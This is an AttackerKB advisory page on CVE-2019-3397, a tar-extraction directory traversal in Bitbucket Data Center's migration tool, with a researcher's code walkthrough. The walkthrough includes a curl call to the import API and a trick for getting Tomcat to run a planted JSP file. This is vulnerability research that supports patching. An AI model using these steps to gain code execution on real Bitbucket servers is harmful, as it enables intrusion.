Lucene search

K
attackerkbAttackerKBAKB:081C8769-2C70-49C4-B371-ACDEBC3B400A
HistoryJun 03, 2019 - 12:00 a.m.

Atlassian BitBucket Data Center Migration Tool Directory Traversal Vulnerability

2019-06-0300:00:00
attackerkb.com
8

0.004 Low

EPSS

Percentile

75.0%

Bitbucket Data Center is the on-premises Git repository management solution for larger enterprises that require high availability and performance at scale. It uses a cluster of Bitbucket server nodes and is designed in your own data center.

A vulnerability was found in the Data Center’s migration tool. If a maliciously crafted archive is placed on the Bitbucket server, a remote user with administrative permissions could import it for data migration, allowing extracted files to be written to arbitrary locations, and result in remote code execution.

Please note that this vulnerability is treated as local and not remote, this is because Bitbucket does not allow archives to be uploaded remotely.

Recent assessments:

wchen-r7 at September 12, 2019 6:06pm UTC reported:

CVE-2019-3397: Atlassian BitBucket Data Center Migration Tool Directory Traversal Vulnerability

Introduction

Bitbucket Data Center is the on-premises Git repository management solution for larger enterprises that require high availability and performance at scale. It uses a cluster of Bitbucket server nodes and is designed in your own data center.

A vulnerability was found in the Data Center’s migration tool. If a maliciously crafted archive is placed on the Bitbucket server, a remote user with administrative permissions could import it for data migration, allowing extracted files to be written to arbitrary locations, and result in remote code execution.

Please note that this vulnerability is treated as local (a file format bug) and not remote, this is because Bitbucket does not allow archives to be uploaded remotely. More details below.

Affected versions:

  • 5.13.0 <= version < 5.13.6

  • 5.14.0 <= version < 5.14.4

  • 5.15.0 <= version < 5.15.3

  • 5.16.0 <= version < 5.16.3

  • 6.0.0 <= version < 6.0.3

  • 6.1.0 <= version 6.1.2

Technical Analysis

Originally, the vulnerability research was influenced by another more generic research effort codenamed Zip Slip, conducted by the Snyk security team in 2018. The Zip Skip research basically concluded that archive extraction could be dangerous due to potential arbitrary file overwrite, and security is often overlooked by many applications. Based on Zip Slip, RIPS’ Code Analysis engine managed to find a similar issue with Bitbucket’s migration tool, which later recognized as CVE-2019-3397.

REST API for Archive Import

Knowing that backstory, we are specifically looking for any Java code or API documentation associated with things such as archive processing (patricianly extraction), data importing, etc, in Bitbucket. According to the Data Center Migration documentation, importing is a feature in the form REST API, and can be used this way with curl:

curl -s -n -X POST -H 'Content-type: application/json' -d '{"archivePath":"Bitbucket_export_422.tar"}' http://localhost:7990/bitbucket/rest/api/1.0/migration/imports | jq .

The documentation is also very clear that the tar file would be imported to the following path:

$BITBUCKET_HOME/shared/data/migration/import

In my installation, this is actually:

/var/atlassian/application-data/bitbucket/shared/data/migration/import

Since the feature is part of REST, we can quickly do a search and find these:

$ find . -name *rest*.jar
./app/WEB-INF/lib/crowd-integration-client-rest-3.3.3-platform5-jdk11-m02.jar
./app/WEB-INF/atlassian-bundled-plugins/bitbucket-rest-ui-6.1.0.jar
./app/WEB-INF/atlassian-bundled-plugins/bitbucket-git-rest-6.1.0.jar
./app/WEB-INF/atlassian-bundled-plugins/atlassian-rest-module-6.0.0.jar
./app/WEB-INF/atlassian-bundled-plugins/bitbucket-rest-6.1.0.jar
./app/WEB-INF/atlassian-bundled-plugins/bitbucket-ref-restriction-6.1.0.jar
./app/WEB-INF/atlassian-bundled-plugins/atlassian-plugins-webresource-rest-4.0.3.jar
./elasticsearch/modules/reindex/elasticsearch-rest-client-6.5.3.jar

The file bitbucket-rest-6.1.0.jar seems to be more of a direct match, so that’s where we start. By decompiling the file and searching for the archivePath string, we found this Java constructor:

@JsonSerialize
public class RestImportRequest extends RestMapEntity {
  // ... some code here ...

  public RestImportRequest(String archivePath) {
    put("archivePath", archivePath);
  }
  
  // ... more code here ...
}

Finding that indicates that we’re looking at the right JAR file. Looking a bit further, we also found this code:

public class MigrationResource extends RestResource {
  // ... some code ...
  @POST
  @Path("/imports")
  public Response startImport(RestImportRequest request) {
    ValidationUtils.validate(this.validator, request, new Class[0]);

    Job exportJob = this.migrationService.startImport(toImportRequest(request));

    return ResponseFactory.ok(new RestJob(exportJob)).build();
  }

  // ... more code ...

The block of code is for handling the /imports path, and notice:

this.migrationService.startImport

this.migrationService is defined as below, which tells us we should be looking at the migrationService instance:

private final MigrationService migrationService;

The MigrationService interface can be found in the bitbucket-api-6.1.0.jar file, but the actual implementation is found in bitbucket-service-impl-6.1.0.jar. In the second file, the startImport function is declared like the following, which indicates that not only the vulnerability requires authentication, it requires admin access:

@Nonnull
@PreAuthorize("hasGlobalPermission('ADMIN')")
public Job startImport(@Nonnull ImportRequest request)

About half way of startImport is where the import process begins, and this block of code is particularly interesting to us:

// ... some code ...
try(FileChannel channel = FileChannel.open(importPath, new OpenOption[] { StandardOpenOption.READ });
    InputStream inputStream = Channels.newInputStream(channel); 
    TarArchiveSource source = new TarArchiveSource(inputStream, importPath)) {
  		context = new DefaultImportContext(source, this.i18nService, importJob, getPercentageSupplier(channel.size(), channel), this.userImportService);
  		this.activeImports.put(Long.valueOf(importJob.getId()), context);
  		try {
    		this.importService.importRepositories(context);
// ... more code ...

In the above code, first we can see that there is a file “channel” is created to load up the input stream for an archive instance. This instance is created to set up for DefaultImportContext, and then this context goes to a function called importRepositories (from the ImportService class).

In the importRepositories function, we see the beginning of tar extraction:

context.iterateEntries(entrySource -&gt; {
  Path path = entrySource.getPath();

  Path namespace = path.getName(0);
  Path relativePath = namespace.relativize(path);
  if (MigrationPaths.INTERNAL_PREFIX.equals(namespace)) {
    handleInternalPath(context, importerMapping, relativePath);
  } else {
    handleImporterPath(context, importerMapping, relativePath, entrySource, namespace);
  } 
});

Exactly how the entry is handled depends on this condition:

MigrationPaths.INTERNAL_PREFIX.equals(namespace)

However, for the most part, it looks like we will most likely hit this function call:

handleImporterPath(context, importerMapping, relativePath, entrySource, namespace);

The most important part of handleImporterPath is this:

public class DefaultImportService extends AbstractService implements ImportService {
  // ... code ...
  private void handleImporterPath(InternalImportContext context, Map&lt;Path, ErrorHandlingDataImporter&gt; importerMapping, Path relativePath, EntrySource entrySource, Path namespace) throws IOException {
    // ... code ...
    if (tarArchive.matches(localPath)) {

      String name = localPath.getFileName().toString();
      name = name.substring(0, name.length() - ".atl.tar".length());
      localPath = localPath.resolveSibling(name);

      importer.importArchiveEntry(new TarArchiveSource(inputStream, localPath));
    } else {
      importer.importEntry(new DefaultEntrySource(inputStream, localPath));
    } 
    // ... code ...

Although there is a condition to determine whether the function should call importArchiveEntry or importEntry, it isn’t a huge deal, because they both rely on a callback function called onArchiveEntry, so they are kind of similar. For example, this is importArchiveEntry:

void importArchiveEntry(ArchiveSource archiveSource) {
  try {
    this.delegate.onArchiveEntry(this.context, archiveSource);
  } catch (Exception e) {
    addCallbackErrorFor(e, "onArchiveEntry", new Object[0]);
    if (e instanceof FatalImportException) {
      throw e;
    }
  } 
}

Archive Extraction

The onArchiveEntry callback comes from the RepositoryAttachmentsImporter class. There is a lot of code in this function, but the most interesting portion is this:

public void onArchiveEntry(@Nonnull ImportContext importContext, @Nonnull ArchiveSource archiveSource) {
  // ... code ...
  Path target = this.storageService.getAttachmentsDir(repo);
  try {
    Files.createDirectories(target, new java.nio.file.attribute.FileAttribute[0]);
  // ... code ...
	archiveSource.extractToDisk(target);
  // ... code ...

The extractToDisk function above comes from TarEntrySource, where the extractToDisk call below is most important:

private static class TarEntrySource extends DefaultEntrySource {
  // ... code ...
  public void extractToDisk(@Nonnull Path target) throws IOException {
    super.extractToDisk(target);
    // ... code ...
}

As you can see, most of the extractToDisk is implemented in the parent class, which is DefaultEntrySource. If we look at that, clearly this is the code responsible for writing our file to disk:

public class DefaultEntrySource implements EntrySource {
  // ... code ...

   public void extractToDisk(@Nonnull Path target) throws IOException {
    Objects.requireNonNull(target, "target");
    
    guardAgainstRepeatedCalls();
    Files.createDirectories(target.getParent(), new java.nio.file.attribute.FileAttribute[0]);
    try (OutputStream out = new FileOutputStream(target.toFile())) {
      IoUtils.copy(this.inputStream, out, 32768);
    } 
  }
}

Possible Remote Code Execution

1st Requirement: Ability to Upload

Typically, an archive extraction bug on a web application is likely a remote type vulnerability, but it does not seem to be the case for Bitbucket, because there is no legit way to upload your TAR file to it.

One possible way I have found is that Bitbucket allows you to create a new storage path on the admin interface, and if you could somehow mount a share, you could make it load the malicious archive remotely, and trigger the extraction. However, in automated exploitation, this is probably unpractical since mounting implies code execution already.

As an attacker, you would need to figure out how to get the malicious archive to the server, and that is beyond the scope of the CVE.

2nd Requirement: Payload Placement

The second requirement to get code execution is the archive needs to embed a JSP payload that is expected to be written to a location that a GET request could reach. Since the archive has direct control of FileOutputStream, this seems possible at first glance, but this is where things get a little bit more interesting.

We know that Bitbucket is based on Apache Tomcat, so the Jasper component would be handling JSP files. In theory, we should be able to place a JSP file in the following directory, and make the server load it:

/opt/atlassian/bitbucket/6.1.0/app

Also, if a JSP file is loaded, the “cached” version should be found in:

/var/atlassian/application-data/bitbucket/tmp/tomcat.5664249735078236529.7990/work/Tomcat/localhost/ROOT/org/apache/jsp/

However, what actually happens is if you just write a file, BitBucket doesn’t seem to want to load it at all, and you will just get a 404 Not-Found when you call it.

For this to work, the secret is that you want to name your JSP file to start with “test”. As an experiment, in the app folder, save your JSP file like this:

echo Hello World &gt; test01.jsp

And then request it with curl, you should get:

$ curl -v http://172.16.135.158:7990/test01.jsp
*   Trying 172.16.135.158...
* TCP_NODELAY set
* Connected to 172.16.135.158 (172.16.135.158) port 7990 (#0)
&gt; GET /test01.jsp HTTP/1.1
&gt; Host: 172.16.135.158:7990
&gt; User-Agent: curl/7.54.0
&gt; Accept: */*
&gt; 
&lt; HTTP/1.1 200 
&lt; X-AREQUESTID: @L2C5R0x973x867x0
&lt; X-ASEN: SEN-L14114184
&lt; x-xss-protection: 1; mode=block
&lt; x-frame-options: SAMEORIGIN
&lt; x-content-type-options: nosniff
&lt; Set-Cookie: BITBUCKETSESSIONID=E1E422B7BCAE9A96C452C629623207E7; Path=/; HttpOnly
&lt; vary: accept-encoding
&lt; Content-Type: text/html
&lt; Transfer-Encoding: chunked
&lt; Date: Wed, 28 Aug 2019 21:13:36 GMT
&lt; 
Hello World

Double check in the cache folder, you should find your JSP file as:

test01_jsp.class
test01_jsp.java

Looking around the web, it doesn’t look like this is the desired behavior. In fact, while poking at BitBucket, it doesn’t even look like there’s any documentation on how to modify Jasper configuration, so likely this is a bug.

Assessed Attacker Value: 0
Assessed Attacker Value: 0Assessed Attacker Value: 0

0.004 Low

EPSS

Percentile

75.0%

Related for AKB:081C8769-2C70-49C4-B371-ACDEBC3B400A